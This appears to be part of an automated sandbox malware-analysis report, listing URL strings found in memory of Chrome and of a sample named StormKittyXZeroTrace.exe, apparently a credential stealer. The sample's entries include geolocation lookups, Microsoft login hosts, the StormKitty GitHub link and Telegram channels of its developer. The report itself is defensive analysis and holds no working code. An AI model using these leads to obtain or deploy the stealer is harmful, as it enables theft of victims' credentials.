Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 0000000A.00000002.1073248685.000016F40084C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://creative-serving.com
Source: chrome.exe, 0000000A.00000002.1076298630.000016F401168000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogl
Source: chrome.exe, 0000000A.00000002.1076298630.000016F401168000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogl.com/cs
Source: chrome.exe, 0000000A.00000002.1056508623.000001CF83EDD000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1
Source: chrome.exe, 0000000A.00000002.1056508623.000001CF83EDD000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
Source: chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074375347.000016F400B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076064219.000016F4010D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074375347.000016F400B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076064219.000016F4010D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074375347.000016F400B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076064219.000016F4010D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074375347.000016F400B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076064219.000016F4010D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: tmp1B07.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.0000000004499000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.00000000044BB000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, tmp1B07.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: tmp1B07.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://explorefledge.com
Source: chrome.exe, 0000000A.00000003.1032353129.000016F401678000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1032534097.000016F4016A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1032502852.000016F401624000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fonts.google.com/icons?selected=Material
Source: tmp1B07.tmp.dat.0.dr	String found in binary or memory: https://gemini.google.com/app?q=
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/glic/intro?20
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/glic2
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009E3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.geoj8
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009E3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.geojs.io
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.geojs.io/v1/ip/geo.json
Source: StormKittyXZeroTrace.exe.bin.exe	String found in binary or memory: https://get.geojs.io/v1/ip/geo.json)root
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009E3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.geojs.io/v1/ip/geoT
Source: StormKittyXZeroTrace.exe.bin.exe	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty0&
Source: chrome.exe, 0000000A.00000003.1011934759.000016F0004D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000000A.00000003.1011881993.000016F0004CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000000A.00000003.1011881993.000016F0004CC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1012011062.000016F0004E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011934759.000016F0004D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000000A.00000003.1011881993.000016F0004CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 0000000A.00000003.1011881993.000016F0004CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Pre
Source: chrome.exe, 0000000A.00000003.1011881993.000016F0004CC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1012011062.000016F0004E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011934759.000016F0004D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1070564721.000016F400004000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 0000000A.00000002.1073589942.000016F4008F4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gunosy.com
Source: StormKittyXZeroTrace.exe.bin.exe	String found in binary or memory: https://ipinfo.io/
Source: chrome.exe, 0000000A.00000002.1074605319.000016F400BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076381472.000016F401194000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075176475.000016F400DA4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 0000000A.00000002.1072310952.000016F400590000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1032028147.000016F401554000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/gen204
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009DB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009DB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075278942.000016F400E04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074007320.000016F4009D0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075613974.000016F400F64000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075086091.000016F400D88000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/:
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/J
Source: chrome.exe, 0000000A.00000002.1072469414.000016F400604000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075086091.000016F400D88000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
Source: chrome.exe, 0000000A.00000002.1072469414.000016F400604000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_defaultle
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://metro.co.uk
Source: chrome.exe, 0000000A.00000002.1076491067.000016F4011E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074309332.000016F400ACC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074700686.000016F400C1C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075483713.000016F400EC4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074100077.000016F400A04000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075483713.000016F400EC4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074100077.000016F400A04000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075483713.000016F400EC4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074100077.000016F400A04000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 0000000A.00000002.1074767816.000016F400C4C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1072140365.000016F4004E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp, chrome.exe, 0000000A.00000002.1076441291.000016F4011C4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 0000000A.00000002.1077613749.000016F401504000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1078129348.000016F4017A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 0000000A.00000002.1072310952.000016F400590000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1077687307.000016F401534000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1032028147.000016F401554000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://outlook.office.com/calendar/
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://passwords.google.comSaved
Source: chrome.exe, 0000000A.00000002.1073720066.000016F400948000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://passwords.google/
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://people.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1074767816.000016F400C4C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1072140365.000016F4004E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp, chrome.exe, 0000000A.00000002.1076441291.000016F4011C4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://postrelease.com
Source: chrome.exe, 0000000A.00000002.1073144667.000016F4007D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 0000000A.00000002.1073144667.000016F4007D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 0000000A.00000002.1071887801.000016F400480000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://samplicio.us
Source: chrome.exe, 0000000A.00000002.1070901504.000016F40011C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 0000000A.00000002.1074605319.000016F400BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076381472.000016F401194000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075176475.000016F400DA4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000000A.00000002.1071381146.000016F4002D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://support.google.com/chrome/a/?p=browser_profile_details
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/96817
Source: chrome.exe, 0000000A.00000002.1072469414.000016F400604000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: tmpB2C2.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org
Source: tmpB2C2.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmpB2C2.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.000000000991C000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009E32000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.00000000098F1000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009911000.00000004.00000800.00020000.00000000.sdmp, Extra.zip.0.dr	String found in binary or memory: https://t.me/ZeroTraceDeveloper
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.000000000991C000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009E32000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.00000000098F1000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009911000.00000004.00000800.00020000.00000000.sdmp, Extra.zip.0.dr	String found in binary or memory: https://t.me/zerotracedev
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.000000000991C000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009E32000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.00000000098F1000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009911000.00000004.00000800.00020000.00000000.sdmp, Extra.zip.0.dr	String found in binary or memory: https://t.me/zerotracegroup
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E04000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://torneos.gg
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tya-dev.com
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009DF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.0000000004499000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.00000000044BB000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075110765.000016F400D9F000.00000004.00001000.00020000.00000000.sdmp, tmp1B07.tmp.dat.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: chrome.exe, 0000000A.00000002.1071381146.000016F4002D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 0000000A.00000002.1070943254.000016F400138000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1071381146.000016F4002D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076839367.000016F40130A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 0000000A.00000002.1071381146.000016F4002D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000000A.00000003.1032666164.000016F4013E8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1073589942.000016F4008F4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076441291.000016F4011C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076702677.000016F40128C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000000A.00000002.1076348765.000016F401180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 0000000A.00000002.1077796964.000016F4015E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1078102170.000016F40178C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 0000000A.00000002.1078188119.000016F4017D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 0000000A.00000002.1073720066.000016F400948000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/#safe
Source: chrome.exe, 0000000A.00000002.1073791910.000016F400980000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/browser-features/
Source: chrome.exe, 0000000A.00000002.1073791910.000016F400980000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/browser-tools/
